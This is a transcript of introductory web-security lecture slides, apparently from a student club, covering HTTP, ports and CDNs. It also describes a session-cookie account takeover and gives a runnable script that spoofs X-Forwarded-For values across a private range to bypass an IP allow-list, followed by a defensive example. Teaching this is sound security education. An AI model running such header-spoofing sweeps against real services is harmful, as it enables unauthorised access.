ITAC | Websec 1

racterub
October 13, 2020

Transcript

  1. About Me
    • Yuan Ze University (元智大學), second-year student in the English-taught Electrical and Communication Engineering program
    • Usual handles: Racterub / Racter
    • 2017-2019: AIS3 trainee
    • 2019: 台灣好厲駭 trainee
    • 2020: 3rd place in the second round of the 民生物聯網漏洞挖掘競賽 (Consumer IoT Vulnerability Discovery Competition)
    • 2020: 3rd place, Zyxel 榮耀資戰
  2. IP

  3. • 10.0.0.0/8 ?
    • CIDR: mainly used for allocating IP address ranges
    • For example, Yuan Ze's allocation on the academic network is 140.138.0.0/16
  4. DNS

  5. DNS

  6. DNS

  7. DNS

  8. HTTP Header (Request)
    GET / HTTP/1.1
    Host: racterub.me
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: text/html,
    Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Highlighted: the HTTP method (how the request is made)
  9. HTTP Header (Request): same request; highlighted: the request path (location of the resource)
  10. HTTP Header (Request): same request; highlighted: the HTTP protocol version (1.1, 1.2, 2)
  11. HTTP Header (Request): same request; highlighted: Host, the name of the site being accessed (domain/IP + port)
  12. HTTP Header (Request): same request; highlighted: User-Agent, which identifies the operating system and the client (browser)
  13. HTTP Header (Response)
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 27 Sep 2020 10:44:42 GMT
    Content-Type: text/html; charset=utf-8
    Last-Modified: Tue, 04 Aug 2020 16:24:02 GMT
    Connection: close
    ETag: W/"5f298ba2-8a3"
    Content-Length: 2211

    <!DOCTYPE HTML> ...
    Highlighted: the status code
  14. HTTP Header (Response): same response; highlighted: the response headers
  15. HTTP Header (Response): same response; highlighted: the body (text content)
  16. HTTP Method
    • GET: requests a representation of the specified resource
    • POST: submits data to the specified resource
    • OPTIONS: asks the server to return all HTTP methods supported for that resource
    • HEAD: same as GET, but the body is not returned
    • PUT: uploads the latest content to the specified resource location
    • DELETE: asks the server to delete the resource identified by the Request-URI
    • CONNECT: reserved for proxy servers that can switch the connection into a tunnel (HTTP 1.1)
    • TRACE: echoes back the request the server received; mainly used for testing or diagnosis
  17. HTTP Status Codes
    • 200: success
    • 300: redirection
    • 400: client error
    • 500: server error
  18. Ports
    • Defined within TCP/IP
    • Port numbers range from 1 to 65535
    • IANA assigns purposes to some ports (but users can define their own)
  19. Ports
    • 21: FTP • 22: SSH • 23: Telnet • 80: HTTP • 443: HTTPS • 3306: MySQL • 3389: RDP
  20. CDN
    • There is still only one server, but a CDN caches the server's static assets, and CDN points of presence are spread across many locations
    • Pros: reduces the load on the server and shortens the distance between the client and the server
    • Cons: after you update data on the server, the CDN edge nodes may not have fetched the latest data yet
  21. Real Case (Y*utu*e)
    The password was changed, and 2FA was changed as well. This kind of attack works against Facebook and Google too; especially on Facebook, once you hold the cookie you can basically log into the account from any device.
  22. Real Case (IP)
    # Script from the slide, made runnable: imports added, the undefined URL
    # and UA turned into labelled placeholders, and the list append fixed
    # (`access += ip` extended the list with single characters, not the address).
    import time
    import requests

    URL = "https://TARGET.example/"  # placeholder: the slide does not name the target
    UA = "Mozilla/5.0"                # placeholder User-Agent

    access = []
    for i in range(256):
        time.sleep(1)
        for j in range(256):
            ip = f"192.168.{i}.{j}"
            print(f"[-] Testing {ip}")
            # The server reads the client address from X-Forwarded-For,
            # so the header is iterated over the 192.168.0.0/16 range
            headers = {"X-Forwarded-For": ip, "User-Agent": UA}
            try:
                r = requests.get(URL, headers=headers)
            except requests.RequestException:
                time.sleep(5)
                r = requests.get(URL, headers=headers)
            if "WARNING" not in r.text:
                print(f"[+] Found : {ip}")
                access.append(ip)
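The server side of the X-Forwarded-For case above, as an added example that is not part of the deck: it parses a raw request like the one on slides 8-12 and then resolves the client address for the allow-list check so that X-Forwarded-For is honoured only when the TCP peer is a trusted reverse proxy. The 10.0.0.0/8 proxy range, the 192.168.0.0/16 allow-list and the sample request are assumed and constructed for the example.

```python
import ipaddress

# Constructed sample: the deck's request (slides 8-12) carrying a spoofed
# X-Forwarded-For like the one the "Real Case (IP)" script sends.
RAW_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: racterub.me\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0)\r\n"
    "X-Forwarded-For: 192.168.1.7\r\n"
    "Connection: close\r\n\r\n"
)
# Assumed deployment: reverse proxies sit in 10.0.0.0/8 and the
# application only admits clients from 192.168.0.0/16.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_CLIENTS = ipaddress.ip_network("192.168.0.0/16")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, version, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}

def client_ip(peer_ip, headers, trusted=TRUSTED_PROXIES):
    """Address to use for access control. X-Forwarded-For is honoured only
    when the TCP peer is a trusted proxy; otherwise it is attacker-controlled."""
    peer = ipaddress.ip_address(peer_ip)
    if not any(peer in net for net in trusted):
        return peer
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",")]
    # Walk right to left, skipping hops that are themselves trusted proxies;
    # the first untrusted hop is the real client.
    for hop in reversed([h for h in hops if h]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed value: fall back to the socket peer
        if not any(addr in net for net in trusted):
            return addr
    return peer

def is_allowed(peer_ip, raw_request):
    """The allow-list check the slide's script probes, done without trusting the header."""
    return client_ip(peer_ip, parse_request(raw_request)["headers"]) in ALLOWED_CLIENTS
```

A direct connection from outside the proxy range is judged by its socket address no matter what the header says, and a proxy that appends the real peer to the chain makes the spoofed leading value irrelevant.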
  23. CTF
    • Jeopardy (problem solving): AIS3 EOF CTF
    • Attack & Defense (teams attack each other inside the contest network): HITCON CTF Finals
    • King of the Hill (capturing and holding machines): CDX
  24. Learning Resources
    • Courses
    • 程式安全 (Program Security) (NTU, NCTU, NTUST, NCU) (not public)
    • Bamboofox (NCTU)
    • NISRA (FJU)
    • NTUST ISC